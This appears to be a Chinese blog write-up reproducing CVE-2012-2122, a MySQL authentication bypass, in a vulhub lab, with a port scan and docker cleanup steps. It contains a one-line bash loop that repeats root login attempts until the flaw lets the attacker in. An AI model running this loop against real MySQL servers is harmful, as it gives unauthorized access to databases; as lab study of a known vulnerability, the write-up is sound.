CVE-2012-2122-mysql未授权访问漏洞复现-vulhub

1.原理

参考:CVE-2012-2122 Mysql身份认证漏洞及利用-CSDN博客

简单来说,除了配置上的问题以外,是密码的验证出现了漏洞,导致尝试次数多了之后直接可以登入

使用:kali+vulhub

2.复现

开一下镜像,用的是vulhub,不了解的可以自己搜一下,网上相关安装挺多的

用ifconfig查一下受攻击机的ip地址

址查一下端口,看看是否正常打开了,发现有3306

用主机的nmap试了下扫描,直接扫端口是扫不到的,因为虚拟机开了防火墙,要-Pn,禁掉ping方式才可以扫到

for i in `seq 1 1000`; do mysql -u root --password=bad -h targetip 2>/dev/null; done(前面让你看的自己ip)

最后记得停止使用容器防止后续其他容器的打开

docker ps 展示所有正在使用的容器

docker stop +容器的id 关闭容器

相关推荐
执子手 吹散苍茫茫烟波几秒前
RC 隔离级别下 MySQL InnoDB 死锁典型案例
数据库·mysql
落叶-IT39 分钟前
Java异常处理深度实战教程:异常传播的失败场景分析
数据库·oracle
执子手 吹散苍茫茫烟波2 小时前
常见的数据库隔离级别以及企业里常用的是什么方案
数据库
Database_Cool_2 小时前
数据库慢查询优化首选方案:阿里云 RDS 性能洞察+自动诊断
数据库·人工智能·阿里云
YOU OU2 小时前
Redis初识
数据库·redis·缓存
长孙豪翔2 小时前
在.net中读写config文件的各种方法
java·数据库·.net
深盾科技_Virbox3 小时前
加密狗授权能力选型:从授权模型到全生命周期管理
java·网络·数据库
峥无4 小时前
深入理解MySQL事务与MVCC机制
数据库·mysql
行思理4 小时前
MongoDB 大数据备份,新手教程
数据库·mongodb
-To be number.wan4 小时前
数据库系统 | 规范化理论
数据库·学习